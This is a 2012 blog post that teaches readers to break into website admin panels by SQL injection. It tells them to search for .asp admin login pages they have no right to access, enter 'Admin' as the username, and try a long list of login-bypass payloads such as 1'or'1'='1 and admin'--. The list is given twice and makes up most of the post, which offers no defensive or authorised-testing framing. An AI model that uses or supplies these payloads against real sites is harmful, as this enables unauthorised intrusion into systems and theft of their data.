Monday, February 13, 2012

Hacking a Website/Admin account using SQL injection.

Hello, The big problem with SQL is its poor security issues surrounding is url strings and the login.

It is the easy way of getting into an administration area of a website that has .asp at the end of it,  we going to use SQL injection for this.
Go to google or any Search Engine and puch in one of these words: adminlogin.asp - login asp - admin area - admin/logon.asp - admin/adminlogin.asp - admin/adminlogon.asp - admin/admin_login.asp - admin/admin_logon.asp - administrator/admin.asp - administrator/login.asp - administrator/logon.asp - root/login.asp - admin/index.asp - admin.asp - login.asp - logon.asp - adminlogin.asp - adminlogon.asp - admin_login.asp - admin_logon.asp - admin/admin.asp - admin/login.asp .................

Now you get a website ending with adminlogin.asp ,enter it.

At the Username/Admin Login/Login Name/User ID/.... : type in "Admin" or "Administrator"
And at the password type in :

'or' '='    (this is the best!!!!!!!-don't put that lol)
1'or'1'='1 (this is also best!!!!!!!-don't put that lol)
’ or 1=1–
1'or'1'='1
0'or'0'='0
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
’ or a=a–
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
'or' '='
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

No comments:

Post a Comment